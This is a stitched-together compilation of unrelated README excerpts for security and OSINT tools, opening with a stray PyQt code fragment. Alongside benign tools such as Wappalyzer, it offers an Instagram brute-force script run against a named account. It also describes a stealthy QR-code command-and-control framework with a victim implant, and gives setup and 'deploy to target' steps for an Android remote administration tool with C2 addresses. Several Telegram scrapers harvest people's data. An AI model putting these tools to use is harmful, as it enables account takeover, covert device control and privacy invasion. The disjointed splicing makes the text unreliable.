    @asyncSlot()
    async def process_text(self):
        """Process the input text based on selected operation"""
        text = self.input_text.toPlainText()
        operation = self.operation_combo.currentText()
        if operation == "Uppercase":
            result = text.upper()
        elif operation == "Lowercase":
            result = text.lower()
        else:  # Title Case
            result = text.title()
        self.output_text.setPlainText(result)
This project is licensed under the Creative Commons Attribution-NonCommercial (CC BY-NC) License.
You are free to:
- Share: Copy and redistribute the material
- Adapt: Remix, transform, and build upon the material
Under these terms:
- Attribution: You must give appropriate credit
- NonCommercial: No commercial use
- No additional restrictions
Special thanks to all library authors and contributors who made this project possible.
Created by ALW1EZ with AI ❤️
This project is a command line tool and Python library that uses the Wappalyzer extension (and its fingerprints) to detect technologies. Other projects that emerged after the official open source project was discontinued use outdated fingerprints and lack accuracy on dynamic web apps; this project bypasses those limitations.
Before installing wappalyzer, you will need to install Firefox and geckodriver. Below are detailed steps for setting up geckodriver, but you may use Google/YouTube for help.
geckodriver-vX.XX.X-win64.zip
geckodriver-vX.XX.X-macos.tar.gz
geckodriver-vX.XX.X-linux64.tar.gz
To ensure Selenium can locate the GeckoDriver executable:
- Windows:
  1. Move geckodriver.exe to a directory (e.g., C:\WebDrivers\).
  2. Add this directory to the system's PATH:
     - Open Environment Variables.
     - Under System Variables, find and select the Path variable, then click Edit.
     - Click New and enter the directory path where geckodriver.exe is stored.
     - Click OK to save.
- macOS/Linux:
  1. Move the geckodriver file to /usr/local/bin/ or another directory in your PATH.
  2. Use the following command in the terminal:
     sudo mv geckodriver /usr/local/bin/
     Ensure /usr/local/bin/ is in your PATH.
pipx install wappalyzer
To use it as a library, install it with pip inside an isolated environment, e.g. venv or docker. You may also use --break-system-packages to do a 'regular' install, but it is not recommended.
git clone https://github.com/s0md3v/wappalyzer-next.git
cd wappalyzer-next
docker compose up -d
To scan URLs using the Docker container:
Scan a single URL:
docker compose run --rm wappalyzer -i https://example.com
docker compose run --rm wappalyzer -i https://example.com -oJ output.json
Some common usage examples are given below, refer to list of all options for more information.
wappalyzer -i https://example.com
wappalyzer -i urls.txt -t 10
wappalyzer -i https://example.com -c "sessionid=abc123; token=xyz789"
wappalyzer -i https://example.com -oJ results.json
Note: For accuracy use 'full' scan type (default). 'fast' and 'balanced' do not use browser emulation.
-i: Input URL or file containing URLs (one per line)
--scan-type: Scan type (default: 'full')
  fast: Quick HTTP-based scan (sends 1 request)
  balanced: HTTP-based scan with more requests
  full: Complete scan using wappalyzer extension
-t, --threads: Number of concurrent threads (default: 5)
-oJ: JSON output file path
-oC: CSV output file path
-oH: HTML output file path
-c, --cookie: Cookie header string for authenticated scans
The Python library is available on PyPI as wappalyzer and can be imported with the same name.
The main function you'll interact with is analyze():
from wappalyzer import analyze
# Basic usage
results = analyze('https://example.com')
# With options
results = analyze(
    url='https://example.com',
    scan_type='full',  # 'fast', 'balanced', or 'full'
    threads=3,
    cookie='sessionid=abc123'
)
url (str): The URL to analyze
scan_type (str, optional): Type of scan to perform
  'fast': Quick HTTP-based scan
  'balanced': HTTP-based scan with more requests
  'full': Complete scan including JavaScript execution (default)
threads (int, optional): Number of threads for parallel processing (default: 3)
cookie (str, optional): Cookie header string for authenticated scans
Returns a dictionary with the URL as key and detected technologies as value:
{
  "https://github.com": {
    "Amazon S3": {"version": "", "confidence": 100, "categories": ["CDN"], "groups": ["Servers"]},
    "lit-html": {"version": "1.1.2", "confidence": 100, "categories": ["JavaScript libraries"], "groups": ["Web development"]},
    "React Router": {"version": "6", "confidence": 100, "categories": ["JavaScript frameworks"], "groups": ["Web development"]}
  },
  "https://google.com": {},
  "https://example.com": {}
}
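A result dictionary of this shape is straightforward to regroup. The sketch below is a hedged example that works on a hand-written sample mirroring the structure above, so it runs without the library or a browser installed. The `technologies_by_category` helper is hypothetical and not part of the wappalyzer package.

```python
def technologies_by_category(results):
    """Group detections as {category: [(url, technology, version), ...]}."""
    grouped = {}
    for url, technologies in results.items():
        for name, details in technologies.items():
            for category in details.get("categories", []):
                grouped.setdefault(category, []).append(
                    (url, name, details.get("version", ""))
                )
    return grouped


if __name__ == "__main__":
    # Sample shaped like the return value documented above.
    sample = {
        "https://github.com": {
            "Amazon S3": {"version": "", "confidence": 100,
                          "categories": ["CDN"], "groups": ["Servers"]},
            "React Router": {"version": "6", "confidence": 100,
                             "categories": ["JavaScript frameworks"],
                             "groups": ["Web development"]},
        },
        "https://example.com": {},
    }
    for category, hits in technologies_by_category(sample).items():
        print(category, hits)
```

URLs with no detections map to an empty dictionary and therefore contribute nothing to the grouped output.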
Firefox extensions are .xpi files which are essentially zip files. This makes it easier to extract data and slightly modify the extension to make this tool work.
Enhanced version of bellingcat's Telegram Phone Checker!
A Python script to check Telegram accounts using phone numbers or usernames.
git clone https://github.com/unnohwn/telegram-checker.git
cd telegram-checker
pip install -r requirements.txt
Contents of requirements.txt:
telethon
rich
click
python-dotenv
Or install packages individually:
pip install telethon rich click python-dotenv
The first time you run the script, you'll need:
- Telegram API credentials (get them from https://my.telegram.org/apps)
- Your Telegram phone number, including the country code with a leading +
- Verification code (sent to your Telegram)
Run the script:
python telegram_checker.py
Choose from options:
1. Check phone numbers from input
2. Check phone numbers from file
3. Check usernames from input
4. Check usernames from file
5. Clear saved credentials
6. Exit
Results are saved in:
- results/ - JSON files with detailed information
- profile_photos/ - Downloaded profile pictures
This tool is for educational purposes only. Please respect Telegram's terms of service and user privacy.
MIT License
Torward is an improved version based on the torghost-gn and darktor scripts, designed to enhance anonymity on the Internet. The tool prevents data leaks and forces all traffic from our computer to be routed exclusively through the Tor network, providing a high level of privacy in our connections.
git clone https://github.com/chundefined/Torward.git
cd Torward
chmod +x install.sh
./install.sh
This version includes several key security improvements to protect your identity and ensure better network configuration:
IPv6 Leak Prevention
IPv6 is now disabled to prevent any potential IP leaks. All traffic is forced through the Tor network by modifying system IPv6 settings in network_config.py.
Enhanced iptables Rules
Strict iptables rules are implemented to ensure only Tor traffic is allowed. Non-Tor traffic is blocked, DNS queries are routed through Tor, and only essential connections to Tor ports are permitted. Additionally, IPv6 traffic is blocked to prevent leaks.
Tor Configuration Adjustments
The torward file has been updated to enforce that all traffic, including DNS queries, is routed through Tor, improving anonymity.
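The IPv6 leak prevention item above can be sanity-checked from a script. The sketch below reads the standard Linux sysctl file for `net.ipv6.conf.all.disable_ipv6`; it is an independent check written for illustration and is not taken from Torward's network_config.py, whose exact mechanism is not shown here. The function names are assumptions.

```python
from pathlib import Path

# Standard Linux location of the net.ipv6.conf.all.disable_ipv6 sysctl.
SYSCTL_PATH = Path("/proc/sys/net/ipv6/conf/all/disable_ipv6")


def ipv6_disabled(sysctl_value: str) -> bool:
    """Interpret the sysctl file content: '1' means IPv6 is disabled."""
    return sysctl_value.strip() == "1"


def check_system():
    """Return True/False for this machine, or None if the file is unavailable."""
    try:
        return ipv6_disabled(SYSCTL_PATH.read_text())
    except OSError:
        return None  # non-Linux system, or IPv6 support not compiled in


if __name__ == "__main__":
    state = check_system()
    if state is None:
        print("Could not read the IPv6 sysctl on this system")
    else:
        print("IPv6 disabled:", state)
```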
Instagram Brute Force CPU/GPU Supported 2024
(Use option 2 while running the script.)
(Option 1 is in development.)
(Chrome must be installed on the device.)
Compatible and Tested (GUI Supported Operating Systems Only)
Python 3.13 x64 bit Unix / Linux / Mac / Windows 8.1 and higher
Install Requirements
pip install -r requirements.txt
How to run
python3 instagram_brute_force.py [instagram_username_without_hashtag]
python3 instagram_brute_force.py mrx161
QuickResponseC2 is a stealthy Command and Control (C2) framework that enables indirect and covert communication between the attacker and victim machines via an intermediate HTTP/S server. All network activity is limited to uploading and downloading images, making it difficult for IPS/IDS systems to detect and an ideal tool for security research and penetration testing.
Command Execution via QR Codes:
Users can send custom commands to the victim machine, encoded as QR codes.
Victims scan the QR code, which triggers the execution of the command on their system.
The command can be anything from simple queries to complex operations based on the test scenario.
Result Retrieval:
Results of the executed command are returned from the victim system and encoded into a QR code.
The server decodes the result and provides feedback to the attacker for further analysis or follow-up actions.
Built-in HTTP Server:
The tool includes a lightweight HTTP server that facilitates the victim machine's retrieval of command QR codes.
Results are sent back to the server as QR code images, and they are automatically saved with unique filenames for easy management.
The attacker's machine handles multiple requests, with HTTP logs organized and saved separately.
Stealthy Communication:
QuickResponseC2 operates under the radar, with minimal traces, providing a covert way to interact with the victim machine without alerting security defenses.
Ideal for security assessments or testing command-and-control methodologies without being detected.
File Handling:
The tool automatically saves all QR codes (command and result) to the server_files directory, using sequential filenames like command0.png, command1.png, etc.
Decoding and processing of result files are handled seamlessly.
User-Friendly Interface:
The tool is operated via a simple command-line interface, allowing users to set up a C2 server, send commands, and receive results with ease.
No additional complex configurations or dependencies are needed.
pip3 install -r requirements.txt
python3 main.py
1 - Run the C2 Server
2 - Build the Victim Implant
https://github.com/user-attachments/assets/382e9350-d650-44e5-b8ef-b43ec90b315d
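The HTTP server listens on port 8080.
Each command is saved as commandX.png on the HTTP server.
When the victim machine finds a new command file (commandX.png), it downloads and decodes the image to retrieve the command.
The result is sent back to the server as a QR code image (resultX.png).
Feel free to fork and contribute! Pull requests are welcome.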
A powerful Python script that allows you to scrape messages and media from Telegram channels using the Telethon library. Features include real-time continuous scraping, media downloading, and data export capabilities.
___________________ _________
\__ ___/ _____/ / _____/
| | / \ ___ \_____ \
| | \ \_\ \/ \
|____| \______ /_______ /
\/ \/
Before running the script, you'll need:
pip install -r requirements.txt
Contents of requirements.txt:
telethon
aiohttp
asyncio
- api_id: A number
- api_hash: A string of letters and numbers
Keep these credentials safe; you'll need them to run the script!
git clone https://github.com/unnohwn/telegram-scraper.git
cd telegram-scraper
pip install -r requirements.txt
python telegram-scraper.py
When scraping a channel for the first time, please note:
The script provides an interactive menu with the following options:
You can use either:
- Channel username (e.g., channelname)
- Channel ID (e.g., -1001234567890)
Data is stored in SQLite databases, one per channel:
- Location: ./channelname/channelname.db
- Table: messages
  - id: Primary key
  - message_id: Telegram message ID
  - date: Message timestamp
  - sender_id: Sender's Telegram ID
  - first_name: Sender's first name
  - last_name: Sender's last name
  - username: Sender's username
  - message: Message text
  - media_type: Type of media (if any)
  - media_path: Local path to downloaded media
  - reply_to: ID of replied message (if any)
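As a rough illustration of working with this table, the sketch below recreates the messages layout in an in-memory database and lists the rows that have downloaded media. The column names come from the list above; the column types, the sample rows, and the helper name messages_with_media are assumptions, not taken from the script.

```python
import sqlite3

# Column names follow the documented table; the types are assumptions.
SCHEMA = """
CREATE TABLE IF NOT EXISTS messages (
    id INTEGER PRIMARY KEY,
    message_id INTEGER,
    date TEXT,
    sender_id INTEGER,
    first_name TEXT,
    last_name TEXT,
    username TEXT,
    message TEXT,
    media_type TEXT,
    media_path TEXT,
    reply_to INTEGER
)
"""


def messages_with_media(conn: sqlite3.Connection) -> list:
    """Return (message_id, media_type, media_path) for rows that have media."""
    cur = conn.execute(
        "SELECT message_id, media_type, media_path FROM messages "
        "WHERE media_path IS NOT NULL ORDER BY message_id"
    )
    return cur.fetchall()


# Demo against an in-memory database, so no real channel data is needed.
conn = sqlite3.connect(":memory:")
conn.execute(SCHEMA)
conn.executemany(
    "INSERT INTO messages (message_id, date, sender_id, message, media_type, media_path) "
    "VALUES (?, ?, ?, ?, ?, ?)",
    [
        (1, "2024-01-01 10:00:00", 42, "hello", None, None),
        (2, "2024-01-01 10:05:00", 42, "photo", "photo", "./channelname/media/2.jpg"),
    ],
)
rows = messages_with_media(conn)
print(rows)
```

To query a real scrape, replace ":memory:" with the database path, for example ./channelname/channelname.db, and skip the CREATE and INSERT statements.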
Media files are stored in:
- Location: ./channelname/media/
- Files are named using message ID or original filename
Data can be exported in two formats:
1. CSV: ./channelname/channelname.csv
   - Human-readable spreadsheet format
   - Easy to import into Excel/Google Sheets
2. JSON: ./channelname/channelname.json
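For readers who want to reproduce the two export formats outside the script, here is a minimal sketch using only the standard library. It is not the script's own export code; the function name export_messages and the trimmed demo table are hypothetical.

```python
import csv
import io
import json
import sqlite3


def export_messages(conn: sqlite3.Connection, csv_file, json_file) -> int:
    """Write every row of `messages` to the given CSV and JSON file objects."""
    cur = conn.execute("SELECT * FROM messages ORDER BY id")
    columns = [col[0] for col in cur.description]  # header row / JSON keys
    rows = cur.fetchall()

    writer = csv.writer(csv_file)
    writer.writerow(columns)
    writer.writerows(rows)

    records = [dict(zip(columns, row)) for row in rows]
    json.dump(records, json_file, ensure_ascii=False, indent=2)
    return len(rows)


# Demo with a trimmed, hypothetical table held in memory.
conn = sqlite3.connect(":memory:")
conn.execute(
    "CREATE TABLE messages (id INTEGER PRIMARY KEY, message_id INTEGER, message TEXT)"
)
conn.execute("INSERT INTO messages (message_id, message) VALUES (10, 'hello')")
csv_buf, json_buf = io.StringIO(), io.StringIO()
count = export_messages(conn, csv_buf, json_buf)
print(count)
```

When writing to real files, open the CSV with newline="" so the csv module controls line endings.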
The continuous scraping feature ([C] option) allows you to:
- Monitor channels in real-time
- Automatically download new messages
- Download media as it's posted
- Run indefinitely until interrupted (Ctrl+C)
- Maintain state between runs
The script can download:
- Photos
- Documents
- Other media types supported by Telegram
It also automatically retries failed downloads and skips existing files to avoid duplicates.
The script includes:
- Automatic retry mechanism for failed media downloads
- State preservation in case of interruption
- Flood control compliance
- Error logging for failed operations
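The retry behaviour is described only at a high level, so the following is a generic sketch of one common approach (retry with exponential backoff) rather than the script's actual mechanism. The helper retry_async and the simulated flaky_download coroutine are hypothetical.

```python
import asyncio


async def retry_async(operation, attempts: int = 3, base_delay: float = 1.0):
    """Await operation() up to `attempts` times, doubling the delay after each failure."""
    for attempt in range(1, attempts + 1):
        try:
            return await operation()
        except Exception:
            if attempt == attempts:
                raise  # out of attempts: surface the last error to the caller
            await asyncio.sleep(base_delay * 2 ** (attempt - 1))


async def _demo():
    calls = {"n": 0}

    async def flaky_download():
        # Simulated download that fails twice before succeeding.
        calls["n"] += 1
        if calls["n"] < 3:
            raise ConnectionError("simulated failure")
        return "media.bin"

    name = await retry_async(flaky_download, attempts=3, base_delay=0)
    return name, calls["n"]


result, tries = asyncio.run(_demo())
print(result, tries)
```

In a real scraper the except clause would usually be narrowed to network and rate-limit errors so that programming mistakes are not retried.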
Contributions are welcome! Please feel free to submit a Pull Request.
This project is licensed under the MIT License - see the LICENSE file for details.
This tool is for educational purposes only. Make sure to:
- Respect Telegram's Terms of Service
- Obtain necessary permissions before scraping
- Use responsibly and ethically
- Comply with data protection regulations
Remote administration tool for Android
git clone https://github.com/Tomiwa-Ot/moukthar.git
Move the server files to /var/www/html/ and install dependencies:
mv moukthar/Server/* /var/www/html/
cd /var/www/html/c2-server
composer install
cd /var/www/html/web-socket/
composer install
cd /var/www
chown -R www-data:www-data .
chmod -R 777 .
The default credentials are username: android and password: android
CREATE USER 'android'@'localhost' IDENTIFIED BY 'your-password';
GRANT ALL PRIVILEGES ON *.* TO 'android'@'localhost';
FLUSH PRIVILEGES;
c2-server/.env and web-socket/.env
database.sql
php Server/web-socket/App.php
# OR
sudo mv Server/websocket.service /etc/systemd/system/
sudo systemctl daemon-reload
sudo systemctl enable websocket.service
sudo systemctl start websocket.service
- Modify /etc/apache2/sites-available/000-default.conf
ErrorLog ${APACHE_LOG_DIR}/error.log
CustomLog ${APACHE_LOG_DIR}/access.log combined
- Modify /etc/apache2/apache2.conf
Comment this section
#
Add this
- Increase php file upload max size in /etc/php/./apache2/php.ini
; Increase size to permit large file uploads from client
upload_max_filesize = 128M
; Set post_max_size to upload_max_filesize + 1
post_max_size = 129M
- Set web socket server address in <script> tag in c2-server/src/View/home.php and c2-server/src/View/features/files.php
const ws = new WebSocket('ws://IP_ADDRESS:8080');
- Restart apache using the command below
sudo a2enmod rewrite && sudo service apache2 restart
- Set C2 server and web socket server address in client functionality/Utils.java
public static final String C2_SERVER = "http://localhost";
public static final String WEB_SOCKET_SERVER = "ws://localhost:8080";
- Compile APK using Android Studio and deploy to target
Lobo Guará is a platform aimed at cybersecurity professionals, with various features focused on Cyber Threat Intelligence (CTI). It offers tools that make it easier to identify threats, monitor data leaks, analyze suspicious domains and URLs, and much more.
Allows identifying domains and subdomains that may pose a threat to organizations. SSL certificates issued by trusted authorities are indexed in real-time, and users can search using keywords of 4 or more characters.
Note: The current database contains certificates issued from September 5, 2024.
Allows the insertion of keywords for monitoring. When a certificate is issued and the common name contains the keyword (minimum of 5 characters), it will be displayed to the user.
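The matching rule described here can be pictured as a case-insensitive substring check against the certificate's common name. This is only an illustrative sketch under that assumption; the function name, the constant, and the sample values are hypothetical, and the platform's real matching logic may differ.

```python
MIN_KEYWORD_LENGTH = 5  # minimum keyword length stated for monitoring


def matching_keywords(common_name: str, keywords: list) -> list:
    """Return the monitored keywords contained in a certificate common name."""
    cn = common_name.lower()
    return [
        kw for kw in keywords
        if len(kw) >= MIN_KEYWORD_LENGTH and kw.lower() in cn
    ]


# "bank" is ignored because it is shorter than the minimum length.
hits = matching_keywords(
    "login.examplebank-secure.com", ["examplebank", "bank", "acme1"]
)
print(hits)
```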
Generates a link to capture device information from attackers. Useful when the security professional can contact the attacker in some way.
Performs a scan on a domain, displaying whois information and subdomains associated with that domain.
Allows performing a scan on a URL to identify URIs (web paths) related to that URL.
Performs a scan on a URL, generating a screenshot and a mirror of the page. The result can be made public to assist in taking down malicious websites.
Monitors a URL with no active application until it returns an HTTP 200 code. At that moment, it automatically initiates a URL scan, providing evidence for actions against malicious sites.
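The monitoring loop can be sketched as a poller that keeps checking the status code and fires a callback once it sees HTTP 200. This is an assumption about the general technique, not Lobo Guará's implementation; http_status, wait_for_200, and their parameters are hypothetical names.

```python
import time
import urllib.error
import urllib.request
from typing import Callable, Optional


def http_status(url: str, timeout: float = 10.0) -> Optional[int]:
    """Return the HTTP status code for `url`, or None if no response arrived."""
    try:
        with urllib.request.urlopen(url, timeout=timeout) as resp:
            return resp.status
    except urllib.error.HTTPError as exc:
        return exc.code  # the server answered, but with an error status
    except (urllib.error.URLError, OSError):
        return None  # DNS failure, refused connection, or timeout


def wait_for_200(
    url: str,
    on_live: Callable[[str], None],
    fetch: Callable[[str], Optional[int]] = http_status,
    interval: float = 60.0,
    max_checks: Optional[int] = None,
    sleep: Callable[[float], None] = time.sleep,
) -> bool:
    """Poll `url` until it returns 200, then call on_live(url) and return True."""
    checks = 0
    while max_checks is None or checks < max_checks:
        if fetch(url) == 200:
            on_live(url)  # e.g. start the URL scan at this point
            return True
        checks += 1
        sleep(interval)
    return False  # gave up after max_checks attempts
```

Passing fetch and sleep as parameters keeps the loop testable without real network access or waiting.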
Centralizes intelligence news from various channels, keeping users updated on the latest threats.
The application installation has been validated on Ubuntu 24.04 Server and Red Hat 9.4; the installation guides are linked below:
Lobo Guará Implementation on Ubuntu 24.04
Lobo Guará Implementation on Red Hat 9.4
There is also a Dockerfile and a docker-compose version of Lobo Guará. Just clone the repo and run:
docker compose up
Then, go to your web browser at localhost:7405.
Before proceeding with the installation, ensure the following dependencies are installed:
git clone https://github.com/olivsec/loboguara.git
cd loboguara/
nano server/app/config.py
Fill in the required parameters in the config.py file:
class Config:
    SECRET_KEY = 'YOUR_SECRET_KEY_HERE'
    SQLALCHEMY_DATABASE_URI = 'postgresql://guarauser:YOUR_PASSWORD_HERE@localhost/guaradb?sslmode=disable'
    SQLALCHEMY_TRACK_MODIFICATIONS = False
    MAIL_SERVER = 'smtp.example.com'
    MAIL_PORT = 587
    MAIL_USE_TLS = True
    MAIL_USERNAME = 'no-reply@example.com'
    MAIL_PASSWORD = 'YOUR_SMTP_PASSWORD_HERE'
    MAIL_DEFAULT_SENDER = 'no-reply@example.com'
    ALLOWED_DOMAINS = ['yourdomain1.my.id', 'yourdomain2.com', 'yourdomain3.net']
    API_ACCESS_TOKEN = 'YOUR_LOBOGUARA_API_TOKEN_HERE'
    API_URL = 'https://loboguara.olivsec.com.br/api'
    CHROME_DRIVER_PATH = '/opt/loboguara/bin/chromedriver'
    GOOGLE_CHROME_PATH = '/opt/loboguara/bin/google-chrome'
    FFUF_PATH = '/opt/loboguara/bin/ffuf'
    SUBFINDER_PATH = '/opt/loboguara/bin/subfinder'
    LOG_LEVEL = 'ERROR'
    LOG_FILE = '/opt/loboguara/logs/loboguara.log'
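Before running the installer, it can help to confirm that no placeholder values were left behind. The sketch below is not part of Lobo Guará; it uses a trimmed stand-in Config class with made-up values, and the helper name unfilled_settings is hypothetical. It flags any upper-case string setting that still contains 'YOUR_'.

```python
class Config:
    # Trimmed stand-in for server/app/config.py; values are illustrative only.
    SECRET_KEY = 'YOUR_SECRET_KEY_HERE'
    MAIL_PORT = 587
    MAIL_PASSWORD = 'example-password'


def unfilled_settings(config_cls) -> list:
    """Return names of upper-case string settings that still contain 'YOUR_'."""
    return sorted(
        name
        for name, value in vars(config_cls).items()
        if name.isupper() and isinstance(value, str) and "YOUR_" in value
    )


missing = unfilled_settings(Config)
print(missing)
```

An empty list means every placeholder of that form has been replaced; it does not validate that the values themselves are correct.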
sudo chmod +x ./install.sh
sudo ./install.sh
sudo -u loboguara /opt/loboguara/start.sh
Access the URL below to register the Lobo Guará Super Admin:
http://your_address:7405/admin
Access the Lobo Guará platform online: https://loboguara.olivsec.com.br/
A Python script that allows you to automatically scrape and download stories from your Telegram friends using the Telethon library. The script continuously monitors and saves both photos and videos from stories, along with their metadata.
Due to Telegram API restrictions, this script can only access stories from:
- Users you have added to your friend list
- Users whose privacy settings allow you to view their stories
This is a limitation of Telegram's API and cannot be bypassed.
Before running the script, you'll need:
pip install -r requirements.txt
Contents of requirements.txt:
telethon
openpyxl
schedule
- api_id: A number
- api_hash: A string of letters and numbers
Keep these credentials safe; you'll need them to run the script!
git clone https://github.com/unnohwn/telegram-story-scraper.git
cd telegram-story-scraper
pip install -r requirements.txt
python TGSS.py
The script:
1. Connects to your Telegram account
2. Periodically checks for new stories from your friends
3. Downloads any new stories (photos/videos)
4. Stores metadata in a SQLite database
5. Exports information to an Excel file
6. Runs continuously until interrupted (Ctrl+C)
SQLite database containing:
- user_id: Telegram user ID of the story creator
- story_id: Unique story identifier
- timestamp: When the story was posted (UTC+2)
- filename: Local filename of the downloaded media
Export file containing the same information as the database, useful for:
- Easy viewing of story metadata
- Filtering and sorting
- Data analysis
- Sharing data with others
{user_id}_{story_id}.jpg
{user_id}_{story_id}.{extension}
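The two naming patterns above can be expressed as a single helper. This is a sketch of the pattern only, not code from the script; the function name story_filename and the sample IDs and "mp4" extension are assumptions for illustration.

```python
def story_filename(user_id: int, story_id: int, extension: str = "jpg") -> str:
    """Build a media filename of the form {user_id}_{story_id}.{extension}."""
    # Accept the extension with or without a leading dot.
    return f"{user_id}_{story_id}.{extension.lstrip('.')}"


photo_name = story_filename(123456, 789)
video_name = story_filename(123456, 790, ".mp4")
print(photo_name, video_name)
```

Because both IDs are part of the name, two stories from the same user cannot overwrite each other on disk.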
The script includes:
- Automatic retry mechanism for failed downloads
- Error logging for failed operations
- Connection error handling
- State preservation in case of interruption
Contributions are welcome! Please feel free to submit a Pull Request.
This project is licensed under the MIT License - see the LICENSE file for details.
This tool is for educational purposes only. Make sure to:
- Respect Telegram's Terms of Service
- Obtain necessary permissions before scraping
- Use responsibly and ethically
- Comply with data protection regulations
- Respect user privacy
This tool is designed to interact with the GitHub API and retrieve specific user details, repository information, and commit emails for a given user.
pip install requests
python3 gitgrab.py